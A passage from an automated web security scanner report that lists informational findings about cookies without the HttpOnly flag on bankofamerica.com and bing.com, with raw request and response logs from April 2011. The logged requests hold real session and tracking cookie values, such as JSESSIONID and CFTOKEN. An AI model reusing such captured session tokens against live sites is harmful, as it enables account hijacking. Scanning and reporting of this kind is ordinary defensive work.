Content-length: 1825
Content-type: application/x-javascript
Last-modified: Sat, 06 Sep 2008 09:35:49 GMT
Etag: "721-48c24ef5"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1017558699.20480.0000; path=/

// Configurable throttle values.
var throttle_percent_ngen = 100;
var throttle_percent_olb = 100;
var throttle_counter_active = false;
var throttle_counter_percent = 0;

// Default values
tc_logging
...[SNIP]...

15.140. http://www.bankofamerica.com/x.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /x.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:15 GMT
Content-length: 49
Content-type: image/gif
Last-modified: Fri, 26 Mar 2004 21:40:13 GMT
Etag: "31-4064a33d"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3259414187.20480.0000; path=/

GIF89a...................!.......,...........T..;

15.141. https://www.bankofamerica.com/military  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /military

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /military HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:52 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:52 GMT
Location: https://www.bankofamerica.com/military/
Connection: close


15.142. https://www.bankofamerica.com/military/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /military/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /military/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:53 GMT
Content-type: text/html; charset=UTF-8
Content-language: en-US
Set-cookie: TRACEID=PRODUCTION%2D171%2E148%2E194%2E109%2D12%3A49%3A53%3A769; Path=/military/; Domain=.bankofamerica.com; Secure
Set-cookie: PILOTSTATE=yes; Expires=Thu, 18 Apr 2041 12:49:52 GMT; Path=/military/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!-- Testing log - REMOVE - START -->


                                   <!-- Testing log - REMOVE - END -->


                   
...[SNIP]...

15.143. https://www.bankofamerica.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:53 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:53 GMT
Location: https://www.bankofamerica.com/privacy/
Connection: close


15.144. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/hs_home/stylesheets/home_win_ns6.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/hs_home/stylesheets/home_win_ns6.css HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:53 GMT
Content-type: text/css
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:53 GMT
Last-modified: Tue, 25 Nov 2008 19:59:27 GMT
Etag: "99e-492c591f"
Accept-ranges: bytes
Content-Length: 12756

.h3-whitetext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #FFFFFF; PADDING-TOP: 18px; FONT-FAMILY: Verdana;
   font-weight: bold
}

.h3-graytext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #333333;
...[SNIP]...

15.145. https://www.bankofamerica.com/www/en_US/global/js/masthead.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/js/masthead.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/js/masthead.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:55 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:55 GMT
Last-modified: Wed, 21 Jan 2009 15:42:02 GMT
Etag: "2aa-4977424a"
Accept-ranges: bytes
Content-Length: 1606

function submit_search(){ document.SiteSearchForm.submit(); }

function bt_rollover(ref, classRef) { eval(ref).className = classRef; }

function create_button(text, href, css_class, onclick_evt,
...[SNIP]...

15.146. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/jquery-1.2.6.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/jquery-1.2.6.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:59 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:59 GMT
Last-modified: Wed, 21 Jan 2009 15:45:14 GMT
Etag: "3d2e-4977430a"
Accept-ranges: bytes
Content-Length: 31043

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...

15.147. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/search-lite.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/search-lite.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:02 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:02 GMT
Last-modified: Thu, 23 Apr 2009 13:34:52 GMT
Etag: "4be-49f06e7c"
Accept-ranges: bytes
Content-Length: 3881

// Search Autocomplete routines.
// updated: 2009.04.02
// English

var search_box_default = "Enter keyword(s)";
var search_box_prompt = "You must enter a keyword before clicking on Search button
...[SNIP]...

15.148. https://www.bankofamerica.com/www/global/js/tc_logging.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/global/js/tc_logging.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/global/js/tc_logging.js? HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
Cache-Control: max-age=0
If-Modified-Since: Wed, 01 Aug 2007 17:46:04 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
If-None-Match: "2f30-46b0c6dc"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US

Response

HTTP/1.1 304 Use local copy
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:59 GMT
Etag: "2f30-46b0c6dc"
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:59 GMT


15.149. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=I=1&TS=1303826034

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:53:57 GMT
Connection: close
Set-Cookie: _HOP=; domain=.bing.com; path=/
Set-Cookie: _SS=SID=DCF7931786ED411F92B64A98A5279BEF; domain=.bing.com; path=/
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; expires=Thu, 25-Apr-2013 13:53:57 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; expires=Thu, 25-Apr-2013 13:53:57 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:53:57 GMT; domain=.bing.com; path=/
Content-Length: 28615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

15.150. http://www.bing.com/HPImageArchive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /HPImageArchive.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HPImageArchive.aspx?format=xml&idx=0&n=1&nc=1303826049818 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; RMS=F=Gg&A=AAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999&bIm=193

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2317
Content-Type: text/xml; charset=utf-8
Date: Tue, 26 Apr 2011 13:54:01 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:54:01 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8" ?><images><image><startdate>20110426</startdate><fullstartdate>201104260700</fullstartdate><enddate>20110427</enddate><url>/fd/hpk2/ConeyIsland_EN-US583531935.jpg<
...[SNIP]...

15.151. http://www.bing.com/fd/ls/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=803a8b1ca015452f8e5a94ace7de8ed0&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:3,%22FC%22:-1,%22BC%22:3,%22BS%22:8,%22H%22:11,%22C1%22:-1,%22C2%22:-1,%22BP%22:475,%22KP%22:-1,%22CT%22:487,%22IL%22:0}}&P=SERP&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 13:53:58 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:53:58 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

15.152. http://www.bing.com/scopePopupHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /scopePopupHandler.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scopePopupHandler.aspx?IID=SERP.1000&IG=803a8b1ca015452f8e5a94ace7de8ed0&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:54:00 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:53:59 GMT; domain=.bing.com; path=/
Content-Length: 4718

